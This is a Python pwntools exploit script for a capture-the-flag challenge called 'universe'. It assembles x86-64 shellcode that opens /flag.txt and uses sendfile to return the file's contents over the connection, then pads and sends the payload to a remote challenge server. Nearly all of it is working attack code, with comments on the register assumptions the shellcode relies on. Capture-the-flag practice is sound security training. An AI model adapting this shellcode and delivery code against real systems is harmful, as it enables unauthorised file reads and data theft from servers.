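#!/usr/bin/python3
"""Exploit for the `universe` challenge.

Sends one 4096-byte page of position-independent shellcode that openat()s
/flag.txt and sendfile()s the first 255 bytes back over the connection.

Usage:
    ./exploit.py          # remote target (challenge.bugpwn.com:1004)
    ./exploit.py LOCAL    # run ./universe locally via pwntools process()
"""
from pwn import *

context.binary = target = ELF("./universe", checksec=False)

# The `lea rsi, [rdx+PATH_OFFSET]` in the stub bakes in where the path string
# lives relative to the buffer start, so the assembled stub MUST be exactly
# PATH_OFFSET bytes long.  build_payload() checks this instead of trusting a
# hand-counted constant.
PATH_OFFSET = 30
PAYLOAD_SIZE = 4096
FLAG_PATH = b"/flag.txt\0"

# openat + sendfile stub.  It is deliberately tiny and therefore depends on the
# register state at entry.  Assumptions (not verifiable from this script —
# confirm against the target's disassembly before trusting a failure):
#   rdx  = address of this buffer      -> lea rsi,[rdx+30] yields the path ptr
#   rax  = 0                           -> add ax,257 yields SYS_openat (257)
#   rdi  = small non-negative value    -> shr edi,255 (count masked to 31)
#                                         leaves edi == 0, i.e. out_fd = stdin
# rdi=0 as out_fd only returns data when stdin and stdout are the same socket
# (the usual xinetd/socat setup).  dirfd=rdi is ignored because the path is
# absolute.  `mov al, 40` (SYS_sendfile) only works if openat succeeded and
# returned an fd < 256; a negative errno in rax turns it into a bogus syscall
# number and nothing comes back.  Comments are kept out of the asm text on
# purpose so the assembled bytes stay identical.
SHELLCODE_SRC = f"""
lea rsi, [rdx+{PATH_OFFSET}]
xor rdx, rdx
xor r10, r10
add ax, 257
syscall
mov rsi, rax
mov al, 40
shr edi, 255
add r10b, 255
syscall
"""


def build_payload(path: bytes = FLAG_PATH, size: int = PAYLOAD_SIZE) -> bytes:
    """Assemble the stub, append the NUL-terminated *path*, NOP-pad to *size*.

    Args:
        path: absolute path to open; a trailing NUL is added if missing.
        size: total payload length the target expects.

    Returns:
        Exactly *size* bytes: stub || path || 0x90 padding.

    Raises:
        RuntimeError: if the assembled stub is not PATH_OFFSET bytes (the lea
            would point into the wrong place), or if stub+path exceed *size*
            (the original code silently produced a short payload here because
            b"\\x90" * negative == b"").
    """
    stub = asm(SHELLCODE_SRC)
    if len(stub) != PATH_OFFSET:
        raise RuntimeError(
            f"assembled stub is {len(stub)} bytes but lea expects {PATH_OFFSET}"
        )
    if not path.endswith(b"\0"):
        path += b"\0"
    body = stub + path
    if len(body) > size:
        raise RuntimeError(f"stub+path is {len(body)} bytes, exceeds {size}")
    return body + b"\x90" * (size - len(body))


# `args.LOCAL` (pwntools) toggles a local process; default is the remote box.
r = process() if args.LOCAL else remote("challenge.bugpwn.com", 1004)

payload = build_payload()
# sendline() puts 4097 bytes on the wire; if the target read()s exactly 4096
# the trailing newline is simply left unread.  Switch to r.send(payload) if the
# target is sensitive to the extra byte.
r.sendline(payload)
r.interactive()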